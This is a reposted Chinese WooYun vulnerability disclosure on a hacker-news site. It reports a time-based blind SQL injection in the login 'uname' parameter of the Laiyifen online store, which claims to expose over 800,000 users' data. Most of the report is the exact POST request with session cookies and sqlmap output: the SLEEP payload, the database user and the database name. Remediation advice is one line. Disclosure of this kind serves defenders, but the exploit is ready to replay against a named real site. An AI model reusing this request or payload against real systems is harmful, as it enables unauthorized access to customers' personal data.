记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

来伊份官方商城某处SQL盲注可致80W+用户数据泄露(第二弹)

2015-01-03 23:20

注入点说明:uname是注入点,如图中星号所示

code 区域
POST /index.php/openapi/pam_callback/login/module/pam_passport_basic/type/member/appid/b2c/redirect/L2luZGV4LnBocC9wYXNzcG9ydC1wb3N0X2xvZ2luLUwybHVaR1Y0TG5Cb2NDOXRaVzFpWlhJdWFIUnRiQT09Lmh0bWw%3D HTTP/1.1

Content-Length: 175

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://www.laiyifen.com:80/

Cookie: vary=b0ce119e2261931586e0e8bebe87b1121a94ee60638487365167a950e7783a9a; laiyifen_cookie=553648906.20480.0000; s=4833654e485fd985efdc4b368115d1f4; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1416322579

Host: www.laiyifen.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



forward=&password=g00dPa%24%24w0rD&uname=*

漏洞证明:

code 区域
sqlmap identified the following injection points with a total of 778 HTTP(s) requests:

---

Place: (custom) POST

Parameter: #1*

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: forward=&password=g00dPa$$w0rD&uname=" AND SLEEP(5) AND "IQDW"="IQDW

---



current user: 'laiyifendb@10.3.%.%'



current database: 'laiyifendb'



其他的我就不证明了,参照之前提交的。盲注是慢点,内容肯定是一样的罗。

修复方案:

为了用户数据安全,商家赶紧排查修复。

知识来源: www.wooyun.org/bugs/wooyun-2015-083889

阅读:104373 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“来伊份官方商城某处SQL盲注可致80W+用户数据泄露(第二弹)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云